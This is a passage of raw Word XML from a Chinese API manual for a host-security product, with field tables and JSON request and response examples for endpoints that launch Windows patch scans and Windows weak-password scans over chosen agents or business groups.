    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4422"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="17AF595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A5D3106" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="542E88D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1843D1BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CD1CCEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="73B867E3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D03561E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="440B8BDF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A01D516" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03587620" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID，如果为null，则当前没有job执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05338116" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04766D80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E5368B1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E43A0C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E93BFD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>执行中；成功；失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23EBE4B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="131" w:name="windows补丁扫描增加范围筛选"/>
      <w:bookmarkEnd w:id="130"/>
      <w:r>
        <w:t>windows补丁扫描增加范围筛选</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB1EB0B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>提供windows补丁扫描指定扫描主机范围的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6392BF10" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8C040" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/patch/win/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB41F42"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497C54" w14:paraId="36CA179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21FEFCF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E3FA0F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A0E98CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D0869A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E81FB2E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01F6DEBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76CB8997" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796A6801" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0224F2C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A0D9E37" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B8DF379" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FC238AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69054F3D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BBDC3CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1381B804" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="477B586E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61FC537E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="281BF951" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54386B85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="727D3E1A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C464AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E573D28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1E81F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C2B6C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA5E4F"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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7830E61F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果有作业在运行返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F922E9"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1EBCEAA3"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34AF628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0822636" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C00CBE5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="359AE7B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12B7EA97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="42FAC751" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47645778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F7C82CA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B26450" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54BF1E50" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>扫描任务ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29BD499D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="window弱密码扫描增加扫描范围筛选"/>
      <w:bookmarkEnd w:id="131"/>
      <w:r>
        <w:t>window弱密码扫描增加扫描范围筛选</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBDE80C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>提供windows弱密码扫描指定扫描主机范围的功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BF04C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE6895" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/vul/weakpwd/win/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBECEDB"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497C54" w14:paraId="3AE7405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C128046" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CCFF0AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0050B80D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33B17BCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="393A4D22" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="549C1BCD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E36B48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46975A89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37790825" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0/1/2 全部主机/agent范围/业务组范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6739DAD9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CADD517" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03D48EA1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C705D9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为1 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC3AFBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机agentId数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3941A35C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="318D93F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F726278" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0238531D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>如果type为2 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45D937E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2624CB21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C916822" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>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agentIds"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"94e4c7a4f5dec750"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154D491" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B8E06" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">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 job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3463BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>如果无在线agent返回：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2D7D2"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no online agent"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ErrorTok"/>
        </w:rPr>
        <w:t>错误描述</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"detail"</w:t>
      </w:r>
      <w:r>
